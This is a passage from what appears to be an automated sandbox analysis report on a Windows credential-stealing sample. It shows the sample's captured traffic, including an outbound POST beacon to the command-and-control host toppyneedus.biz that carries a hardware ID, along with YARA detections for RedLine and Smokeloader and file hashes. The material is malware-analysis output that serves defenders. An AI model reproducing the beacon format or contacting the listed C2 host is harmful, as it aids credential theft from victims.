2025-01-26 14:48:08 UTC | 15331 | OUT | Data Raw: a7 37 22 4e c8 05 7b 51 93 11 c7 da 39 98 73 cd 5d 74 8d 62 df 74 54 19 da dc e0 d9 9a f4 05 ef ec d9 d3 9e 37 3f cd 90 20 a5 ac ff 6c bf e7 3f eb 97 7f 63 f6 25 7f b8 c7 89 3f d7 18 56 6b c3 68 e1 a5 fa d9 89 62 c7 ab 66 68 cc 7e 1e 86 ba de 9f e2 b2 9e 35 fb d2 ef 8e 12 4c 0d 18 7c e0 3b f2 6c ce 8f b8 4a a4 ce e9 ba b2 61 4e 67 0d a6 b7 a9 92 f2 c5 a0 8d ba 70 cb ac 67 c4 96 5f 19 c2 cd c2 98 05 ba a4 88 06 d9 a6 88 27 c3 4c 77 f4 8a bb 60 c3 cc 8e ae f4 0f da f3 ff 48 af fc 1b 36 47 99 ba 6a 76 59 10 74 f9 35 9a 6c 41 82 12 25 76 fb 33 4e 13 82 b1 dd e7 66 b5 4f e7 42 44 48 df d4 17 05 f7 eb 59 7a 67 76 7a cf d2 5d c5 4a 2f 87 55 bf 71 0f a0 52 6a dc ed 73 2c d9 eb f9 87 ef 1e 6b b6 6e 58 95 f8 3b 67 ab 71 d7 df 13 ff 6a 82 c4 ff 82 22 a2 d1 10 74 e8
                                                                                                  Data Ascii: 7"N{Q9s]tbtT7? l?c%?Vkhbfh~5L|;lJaNgpg_'Lw`H6GjvYt5lA%v3NfOBDHYzgvz]J/UqRjs,knX;gqj"t
2025-01-26 14:48:11 UTC | 1137 | IN | HTTP/1.1 200 OK
                                                                                                  Date: Sun, 26 Jan 2025 14:48:11 GMT
                                                                                                  Content-Type: text/html; charset=UTF-8
                                                                                                  Transfer-Encoding: chunked
                                                                                                  Connection: close
                                                                                                  Set-Cookie: PHPSESSID=2mti2v8sh61fqsc57loo8b9jv2; expires=Thu, 22 May 2025 08:34:49 GMT; Max-Age=9999999; path=/
                                                                                                  Expires: Thu, 19 Nov 1981 08:52:00 GMT
                                                                                                  Cache-Control: no-store, no-cache, must-revalidate
                                                                                                  Pragma: no-cache
                                                                                                  X-Frame-Options: DENY
                                                                                                  X-Content-Type-Options: nosniff
                                                                                                  X-XSS-Protection: 1; mode=block
                                                                                                  cf-cache-status: DYNAMIC
                                                                                                  vary: accept-encoding
                                                                                                  Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=%2F0riiMEr56Z6%2FgkFUsuSmrJgAQUgCnaXzHJonHUVgaimyKJDO5oLcLynw%2BYa22k0YUxoXvmOQVZGnfIxkziDAdu%2F2MMxGviR9TWwR1zP3M%2FTnZObiDR1hb%2FzHHSYEP5TrC8%3D"}],"group":"cf-nel","max_age":604800}
                                                                                                  NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                                                                                  Server: cloudflare
                                                                                                  CF-RAY: 90814d5e884a0cc2-EWR
                                                                                                  alt-svc: h3=":443"; ma=86400
                                                                                                  server-timing: cfL4;desc="?proto=TCP&rtt=1635&min_rtt=1628&rtt_var=624&sent=196&recv=577&lost=0&retrans=0&sent_bytes=2838&recv_bytes=559742&delivery_rate=1733966&cwnd=177&unsent_bytes=0&cid=c79dc0aa5095e199&ts=2611&x=0"


Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
7 | 192.168.2.7 | 49746 | 172.67.149.66 | 443 | 7120 | C:\Users\user\Desktop\4JPKDcwtDo.exe
Timestamp | Bytes transferred | Direction | Data
2025-01-26 14:48:11 UTC | 263 | OUT | POST /api HTTP/1.1
                                                                                                  Connection: Keep-Alive
                                                                                                  Content-Type: application/x-www-form-urlencoded
                                                                                                  User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36
                                                                                                  Content-Length: 77
                                                                                                  Host: toppyneedus.biz
2025-01-26 14:48:11 UTC | 77 | OUT | Data Raw: 61 63 74 3d 67 65 74 5f 6d 65 73 73 61 67 65 26 76 65 72 3d 34 2e 30 26 6c 69 64 3d 34 68 35 56 66 48 2d 2d 26 6a 3d 26 68 77 69 64 3d 46 32 31 39 43 36 39 42 31 46 43 30 43 36 46 31 34 36 35 34 46 44 39 41 30 38 38 34 33 37 30 45
                                                                                                  Data Ascii: act=get_message&ver=4.0&lid=4h5VfH--&j=&hwid=F219C69B1FC0C6F14654FD9A0884370E
2025-01-26 14:48:12 UTC | 1125 | IN | HTTP/1.1 200 OK
                                                                                                  Date: Sun, 26 Jan 2025 14:48:12 GMT
                                                                                                  Content-Type: text/html; charset=UTF-8
                                                                                                  Transfer-Encoding: chunked
                                                                                                  Connection: close
                                                                                                  Set-Cookie: PHPSESSID=b6facoub3d94ht8475c6qu2pt1; expires=Thu, 22 May 2025 08:34:51 GMT; Max-Age=9999999; path=/
                                                                                                  Expires: Thu, 19 Nov 1981 08:52:00 GMT
                                                                                                  Cache-Control: no-store, no-cache, must-revalidate
                                                                                                  Pragma: no-cache
                                                                                                  X-Frame-Options: DENY
                                                                                                  X-Content-Type-Options: nosniff
                                                                                                  X-XSS-Protection: 1; mode=block
                                                                                                  cf-cache-status: DYNAMIC
                                                                                                  vary: accept-encoding
                                                                                                  Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=uesTc%2Bk52eb5QqsVGovvKwxTz847RbkU95C5E7m%2FXJ8ajs2%2F0mDf6V8rq5oDIX0Oex5yb54N%2FiXgrWgKJwVDyIyev2rQQuHcIaQp1pL7f77L7qjPQhYaxnYhrLTOo6yKqWs%3D"}],"group":"cf-nel","max_age":604800}
                                                                                                  NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                                                                                  Server: cloudflare
                                                                                                  CF-RAY: 90814d72df348c0f-EWR
                                                                                                  alt-svc: h3=":443"; ma=86400
                                                                                                  server-timing: cfL4;desc="?proto=TCP&rtt=1857&min_rtt=1853&rtt_var=703&sent=5&recv=7&lost=0&retrans=0&sent_bytes=2838&recv_bytes=976&delivery_rate=1548250&cwnd=229&unsent_bytes=0&cid=5f68dbdbe1b1ed36&ts=496&x=0"
2025-01-26 14:48:12 UTC | 54 | IN | Data Raw: 33 30 0d 0a 4a 62 4c 49 4a 78 56 78 46 75 57 45 59 6b 54 2b 61 68 71 55 7a 72 75 73 6d 4f 6a 34 64 6e 59 44 38 46 48 4d 72 33 67 70 59 4f 70 2b 37 77 3d 3d 0d 0a
                                                                                                  Data Ascii: 30JbLIJxVxFuWEYkT+ahqUzrusmOj4dnYD8FHMr3gpYOp+7w==
2025-01-26 14:48:12 UTC | 5 | IN | Data Raw: 30 0d 0a 0d 0a
                                                                                                  Data Ascii: 0


[Chart: time (0-100 s) against a 0-100 scale]

[Chart: time (0-100 s) against 0-15 MB]

[Chart: process behavior distribution, legend: File, Registry]

                                                                                                  Target ID:4
                                                                                                  Start time:09:47:57
                                                                                                  Start date:26/01/2025
                                                                                                  Path:C:\Users\user\Desktop\4JPKDcwtDo.exe
                                                                                                  Wow64 process (32bit):true
                                                                                                  Commandline:"C:\Users\user\Desktop\4JPKDcwtDo.exe"
                                                                                                  Imagebase:0x400000
                                                                                                  File size:400'384 bytes
                                                                                                  MD5 hash:5530E06DB7D6818359BEF99C53EBEF57
                                                                                                  Has elevated privileges:true
                                                                                                  Has administrator privileges:true
                                                                                                  Programmed in:C, C++ or other language
                                                                                                  Yara matches:
                                                                                                  • Rule: JoeSecurity_CredentialStealer, Description: Yara detected Credential Stealer, Source: 00000004.00000003.1352139150.000000000074C000.00000004.00000020.00020000.00000000.sdmp, Author: Joe Security
                                                                                                  • Rule: Windows_Trojan_RedLineStealer_ed346e4c, Description: unknown, Source: 00000004.00000002.1650950894.0000000000678000.00000040.00000020.00020000.00000000.sdmp, Author: unknown
                                                                                                  • Rule: Windows_Trojan_Smokeloader_3687686f, Description: unknown, Source: 00000004.00000002.1651366354.0000000002100000.00000040.00001000.00020000.00000000.sdmp, Author: unknown
                                                                                                  • Rule: JoeSecurity_CredentialStealer, Description: Yara detected Credential Stealer, Source: 00000004.00000003.1352545477.0000000000750000.00000004.00000020.00020000.00000000.sdmp, Author: Joe Security
                                                                                                  Reputation:low
                                                                                                  Has exited:true

                                                                                                  Target ID:11
                                                                                                  Start time:09:48:11
                                                                                                  Start date:26/01/2025
                                                                                                  Path:C:\Windows\SysWOW64\WerFault.exe
                                                                                                  Wow64 process (32bit):true
                                                                                                  Commandline:C:\Windows\SysWOW64\WerFault.exe -u -p 7120 -s 616
                                                                                                  Imagebase:0x690000
                                                                                                  File size:483'680 bytes
                                                                                                  MD5 hash:C31336C1EFC2CCB44B4326EA793040F2
                                                                                                  Has elevated privileges:true
                                                                                                  Has administrator privileges:true
                                                                                                  Programmed in:C, C++ or other language
                                                                                                  Reputation:high
                                                                                                  Has exited:true

                                                                                                  Non-executed Functions

                                                                                                  Strings
                                                                                                  Memory Dump Source
                                                                                                  • Source File: 00000004.00000003.1352162990.0000000000708000.00000004.00000020.00020000.00000000.sdmp, Offset: 00708000, based on PE: false
                                                                                                  Joe Sandbox IDA Plugin
                                                                                                  • Snapshot File: hcaresult_4_3_708000_4JPKDcwtDo.jbxd
                                                                                                  Similarity
                                                                                                  • API ID:
                                                                                                  • String ID: BRZ$BTZ$BVZ
                                                                                                  • API String ID: 0-3476765399
                                                                                                  • Opcode ID: 9caa18a8b207bfbcc21e96793ea13f94d76620dfd4578c794d28754007e76399
                                                                                                  • Instruction ID: 242d5b0d75e64b768459a7f2801baf96459743f409a02db5984b9a72d34e6025
                                                                                                  • Opcode Fuzzy Hash: 9caa18a8b207bfbcc21e96793ea13f94d76620dfd4578c794d28754007e76399
                                                                                                  • Instruction Fuzzy Hash: E5A21E5144E3C18FD7278B704939691BFB0AE23214B1E8ADFC4C58F8E3E25D984AD362